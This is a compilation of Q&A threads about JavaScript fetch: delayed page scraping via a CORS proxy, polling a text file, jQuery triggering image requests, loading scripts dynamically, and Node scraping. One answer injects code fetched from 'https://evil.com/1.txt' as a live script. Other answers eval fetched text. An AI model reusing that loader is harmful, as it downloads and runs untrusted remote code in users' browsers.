How fetch and wait 5 seconds and get source code of page - javascript

I have two websites, the first get web source code of the second (The two websites aren't one same host -> CORS). (The second website is not mine)
Example:
fetch("https://api.allorigins.win/get?url=" + url)
.then(response => {
if (response.ok) {
return response.json();
}
throw new Error('Network response was not ok.');
})
.then(data => {
var html = stringToHTML(data.contents);
});
It works, except that the concern is that the second page displays other elements several seconds after being displayed, so it does not display me because I retrieved the page too early.
How to make it wait a few seconds before recovering, while not forgetting that "api.allorigins.win"?
Do you have an idea? ( I use Vanillia JS )

Allorigins that must wait for rendering, but it does not.
Your alternative is to implement your own version of allorigins using an headless browser that waits the page render before returning it html. There's no ready solution for it

I don't know if you're using a framework or any library to handle the DOM, but with vanilla JS you can do something like this to check if your DOM element is ready
const DOMReadyCheck = setInterval(() => {
if (document.getElementsBy...) { //get your element here
//send your fetch request and set your element with data
clearInterval(DOMReadyCheck);
}

Related

Refresh/Retrigger "Fetch" in a HTML/javascript

First things first: I don't know anything about coding and I basically build my whole HTML file by CMD+C and CMD+V what I found with lots of Google searches and change just what is needed so it fits into what I intended. Interestingly I got a result that is 95% what I wanted.
Now I have just one last thing I can't set (or find about in Google) so hopefully someone can answer it here. [Trying to put in as many information as I can]
I made a simple one page HTML that shows the date/time and plays an audio livestream from my PC when opened.
I also want it to display the "Now Playing" information. After a lot of searches, I finally found a solution that even I could make with Dreamweaver.
I used the "fetch script" (or is it called Fetch APP?) to get a txt file that my music player gives as output with the current song information. That fetch script get the data and put it into a
The problem is that is only seems to do it once at page load and not every few seconds. The contents in the txt change whenever a new song plays and I want the displayed data on the HTML to stay current as well.
So how do I set that fetch script to re-fetch the txt contents every ~10 seconds?
Here is my current fetch script:
<script>
var url = 'NowPlaying.txt';
var storedText;
fetch(url)
.then(function(response) {
response.text().then(function(text) {
storedText = text;
currentSong();
});
});
function currentSong() {
document.getElementById('thesong').textContent = storedText;
}
</script>
For making my HTML I use "Dreamweaver 2019" on "Mac OS 11 Big Sur"
It's a single HTML and all files/assets the HTML accesses (The Audio, Background Images and the TXT file are in the same directory/network)
I hope that provides all necessary details.
Oh and what I tried already is to copy the line "var t = setTimeout(fetch, 100);" into the script, because this seems to be what keeps the clock javascript current and I hoped it would do the same with fetch
Also attached a screenshot of the HTML "live" in chrome >> screenshot
As you can see, the bottom is supposed to have the "Now Playing" information displayed (please ignore that in this example the text is cut to the right, the current information is too long, so it cuts off at the end)
You cam simply use setInterval to call your fetch every 10th seconds.
Just wrap your function in to a function and call that function in setInterval.
=> Also, at sometime if you would like to stop the fetch request on an event like a button click or something you can use clearInterval to stop the fetch request without refreshing the page.
Run snippet below to see the function is getting called every 10th seconds.
var url = 'NowPlaying.txt';
var storedText;
//10 Seconds fetch
function fetch10Seconds() {
//Fetch
fetch(url)
.then(function(response) {
response.text().then(function(text) {
storedText = text;
currentSong();
});
});
console.log('Fetch again in 10 Seconds')
}
//Call function every 10 seconds
setInterval(fetch10Seconds, 10000); // 10 seconds are defined in miliseconds
//Call this on fetch every 10 seconds
function currentSong() {
document.getElementById('thesong').textContent = storedText;
}
You can create a loop using setInterval function
var url = 'NowPlaying.txt';
var storedText;
setInterval(()=>{
fetch(url)
.then(function(response) {
response.text().then(function(text) {
storedText = text;
currentSong();
});
});
},10000) // in miliseconds
function currentSong() {
document.getElementById('thesong').textContent = storedText;
}
Try this:
function doFetch() {
setTimeout(() => {
fetch(url)
.then(response => {
response.text().then(text => {
storedText = text;
currentSong();
doFetch();
});
});
}, 10000);
}
doFetch();
This waits for the data to be fetched before waiting another 10 seconds and fetching again. Using setInterval will get the data every 10 seconds on the dot regardless of the success of the last run of the function.

Using jQuery on ajax response triggers additional network requests

I am writing a small script that takes a bunch of links from a page, fetches them and scours the results for some data.
E.g. like this:
let listLinks = $('.item a');
listLinks.each(function() {
let url = this.href;
fetch(url, {
credentials: 'include'
})
.then(response => response.text())
.then(function(html) {
let name = $('#title h1', html);
})
});
My problem is the fact that once we reach selector on the response the network tab in my browser's dev-tools lights up with requests for a ton of resources, as if something (jquery?) is just loading the entire page!
What the hell is going on here?
I don't want to load the entire page(resources and all), I just want to take a bunch of text from the html response!
Edit: After some more scrutiny, I discovered it only makes network requests for any images on the ajaxed page, but not scripts or stylesheets.
It does not make these requests if I try to process the html in another way - say, call .indexOf() on it. Only if I decide to traverse it via jquery.
Edit2: Poking around in dev tools, the network tab has an "initiator" column. It says this is the initiator for the requests: github code. I don't know what to make of that however...
P.S. Inb4 "just regex it".
I've discovered the cause:
My code above(relevant line):
$('#title h1', html)
is equivalent to
$(html).find('#title h1')
And $(html) essentially creates DOM elements. Actual, literal DOM objects.
When you create an <img> element(which the HTML I parse contains), the browser automatically issues a network request.
Relevant StackOverflow question:
Set img src without issuing a request
With the code in the question the created DOM elements are still associated with the current document(as noted here), therefore the browser automatically makes a request for new <img>s it doesn't have yet.
The correct solution is to create a separate document, e.g.
let parser = new DOMParser();
let doc = parser.parseFromString(html, "text/html");
let name = $('#title h1', doc);
No network requests go out in this case.
JSFiddle
The problem is that you are using fetch. Use jQuery.AJAX
$.ajax({
url: 'URL',
type: 'GET',
dataType: 'HTML',
success: function(responseHTML) {
console.log(responseHTML);
}
});

Can I run a JS script from another using `fetch`?

Lower intermediate JS/JQ person here.
I'm trying to escape callback hell by using JS fetch. This is billed as "the replacement for AJAX" and seems to be pretty powerful. I can see how you can get HTML and JSON objects with it... but is it capable of running another JS script from the one you're in? Maybe there's another new function in ES6 to do:
$.getScript( 'xxx.js' );
i.e.
$.ajax({ url : 'xxx.js', dataType : "script", });
...?
later, response to Joseph The Dreamer:
Tried this:
const createdScript = $(document.createElement('script')).attr('src', 'generic.js');
fetch( createdScript )...
... it didn't run the script "generic.js". Did you mean something else?
Fetch API is supposed to provide promise-based API to fetch remote data. Loading random remote script is not AJAX - even if jQuery.ajax is capable of that. It won't be handled by Fetch API.
Script can be appended dynamically and wrapped with a promise:
const scriptPromise = new Promise((resolve, reject) => {
const script = document.createElement('script');
document.body.appendChild(script);
script.onload = resolve;
script.onerror = reject;
script.async = true;
script.src = 'foo.js';
});
scriptPromise.then(() => { ... });
SystemJS is supposed to provide promise-based API for script loading and can be used as well:
System.config({
meta: {
'*': { format: 'global' }
}
});
System.import('foo.js').then(() => { ... });
There are a few things to mention on here.
Yes, it is possible to execute a javascript just loaded from the server. You can fetch the file as text and user eval(...) while this is not recommended because of untrackeable side effects and lack of security!
Another option would be:
1. Load the javascript file
2. Create a script tag with the file contents (or url, since the browser caches the file)
This works, but it may not free you from callback hell perse.
If what you want is load other javascript files dinamically you can use, for example requirejs, you can define modules and load them dinamically. Take a look at http://requirejs.org/
If you really want to get out of the callback hell, what you need to do is
Define functions (you can have them in the same file or load from another file using requirejs in the client, or webpack if you can afford a compilation before deployment)
Use promises or streams if needed (see Rxjs https://github.com/Reactive-Extensions/RxJS)
Remember that promise.then returns a promise
someAsyncThing()
.then(doSomethingAndResolveAnotherAsncThing)
.then(doSomethingAsyncAgain)
Remember that promises can be composed
Promise.all(somePromise, anotherPromise, fetchFromServer)
.then(doSomethingWhenAllOfThoseAreResolved)
yes u can
<script>
fetch('https://evil.com/1.txt').then(function(response) {
if (!response.ok) {
return false;
}
return response.blob();
}) .then(function(myBlob) {
var objectURL = URL.createObjectURL(myBlob);
var sc = document.createElement("script");
sc.setAttribute("src", objectURL);
sc.setAttribute("type", "text/javascript");
document.head.appendChild(sc);
})
</script>
dont listen to the selected "right" answer.
Following fetch() Api works perfectly well for me, as proposed by answer of #cnexans (using .text() and then .eval()). I noticed an increased performance compared to method of adding the <script> tag.
Run code snippet to see the fetch() API loading async (as it is a Promise):
// Loading moment.min.js as sample script
// only use eval() for sites you trust
fetch('https://momentjs.com/downloads/moment.min.js')
.then(response => response.text())
.then(txt => eval(txt))
.then(() => {
document.getElementById('status').innerHTML = 'moment.min.js loaded'
// now you can use the script
document.getElementById('today').innerHTML = moment().format('dddd');
document.getElementById('today').style.color = 'green';
})
#today {
color: orange;
}
<div id='status'>loading 'moment.min.js' ...</div>
<br>
<div id='today'>please wait ...</div>
The Fetch API provides an interface for fetching resources (including across the network). It will seem familiar to anyone who has used XMLHttpRequest, but the new API provides a more powerful and flexible feature set. https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API
That's what it's supposed to do, but unfortunately it doesn't evaluate the script.
That's why I released this tiny Fetch data loader on Github.
It loads the fetched content into a target container and run its scripts (without using the evil eval() function.
A demo is available here: https://www.ajax-fetch-data-loader.miglisoft.com
Here's a sample code:
<script>
document.addEventListener('DOMContentLoaded', function(event) {
fetch('ajax-content.php')
.then(function (response) {
return response.text()
})
.then(function (html) {
console.info('content has been fetched from data.html');
loadData(html, '#ajax-target').then(function (html) {
console.info('I\'m a callback');
})
}).catch((error) => {
console.log(error);
});
});
</script>

Multiple web service calls from chrome extension

I'm writing my first JavaScript Chrome Extension using JQuery 2.2.0, which basically takes the current URL and polls a few different web services to see if they have a record of the URL. If it exists, I add a text link in the DOM. Here's a simplified working version:
// Does the provided URL exist?
function url_exists(url) {
var h = new XMLHttpRequest();
h.open('HEAD', url, false);
h.send();
return h.status!=404;
}
// Display a link to the database record URL in the DOM
function display_database_link(url) {
$('body').prepend('Link');
}
// Get the current URL
var url = window.location.href;
var database_number = 0;
// See if this URL exists in one of our databases via the API
// Does the URL exist in database 1?
if (url_exists("https://api.database1.com/urls/" + url)) {
database_number = 1;
}
// Does the URL exist in database 2?
else if (url_exists("https://api.database2.com/urls/" + url)) {
database_number = 2;
}
if (database_number > 0) {
display_database_link("https://api.database" + database_number + ".com/urls/" + url))
}
What I have works, but I'm wondering if:
there's a way to make multiple calls to url_exists at once, and
if there's a way to do this asynchronously.
If someone could respond with a link to relevant documentation or examples, I'd really appreciate it!
There are a couple of awesome es2015 features that will make this nice and easy: fetch and promises. You'll have to do some tweaking but something like this should work.
// Array of API endpoints to to make requests to
let url = window.location.href;
let database_urls = ["https://api.database1.com/urls/", "https://api.database2.com/urls/"];
// Promise.all will take an array of promises and perform all of them, and `then` process all results at the end
Promise.all(database_urls.map(database_url =>
// Make an HTTP request to the endpoint, and `then` get the status code from the response
fetch(database_url + url).then(response => response.status)
// Once `all` promises are resolved, `then` iterate over the resulting statuses
)).then(statuses => {
// Reduce `statuses` to a count of how many are not 404s
let existCount = statuses.reduce((prev, curr) => {return curr == 404 ? prev : prev + 1}, 0);
// Call method to display link if existsCount is > 0
});
Yes, you can make all of them at once, the browser will execute them at once but the results will take diferente amounts of time to reach you...
You have: h.open('HEAD', url, false); the third parameter (false) defines if the request is asynchronous or synchronous.... It should be set to true: http://www.w3schools.com/ajax/ajax_xmlhttprequest_send.asp
Since you have jQuery why not use the AJax function? http://api.jquery.com/jquery.ajax/
Be careful, if your extension is making 1000 requests to 1000 databases it will slow down the user browser/internet.
This requests take X amount of time until you get a response back, so don't immediately check if database_number is greater than 0.

node.js request a webpage with async scripts

I'm downloading a webpage using the request module which is very straight forward.
My problem is that the page I'm trying to download has some async scripts (have the async attributes) and they're not downloaded with the html document return from the http request.
My question is how I can make an http request with/with-out (preferably with) request module, and have the WHOLE page download without exceptions as described above due to some edge cases.
Sounds like you are trying to do webscraping using Javascript.
Using request is a very fundemental approach which may be too low-level and tiome consuming for your needs. The topic is pretty broad but you should look into more purpose built modules such as cheerio, x-ray and nightmare.
x-ray x-ray will let you select elements directly from the page in a jquery like way instead of parsing the whole body.
nightmare provides a modern headless browser which makes it possible for you to enter input as though using the browser manually. With this you should be able to better handle the ajax type requests which are causing you problems.
HTH and good luck!
Using only request you could try the following approach to pull the async scripts.
Note: I have tested this with a very basic set up and there is work to be done to make it robust. However, it worked for me:
Test setup
To set up the test I create a html file which includes a script in the body like this: <script src="abc.js" async></script>
Then create temporary server to launch it (httpster)
Scraper
"use strict";
const request = require('request');
const options1 = { url: 'http://localhost:3333/' }
// hard coded script name for test purposes
const options2 = { url: 'http://localhost:3333/abc.js' }
let htmlData // store html page here
request.get(options1)
.on('response', resp => resp.on('data', d => htmlData += d))
.on('end', () => {
let scripts; // store scripts here
// htmlData contains webpage
// Use xml parser to find all script tags with async tags
// and their base urls
// NOT DONE FOR THIS EXAMPLE
request.get(options2)
.on('response', resp => resp.on('data', d => scripts += d))
.on('end', () => {
let allData = htmlData.toString() + scripts.toString();
console.log(allData);
})
.on('error', err => console.log(err))
})
.on('error', err => console.log(err))
This basic example works. You will need to find all js scripts on the page and extract the url part which I have not done here.

Categories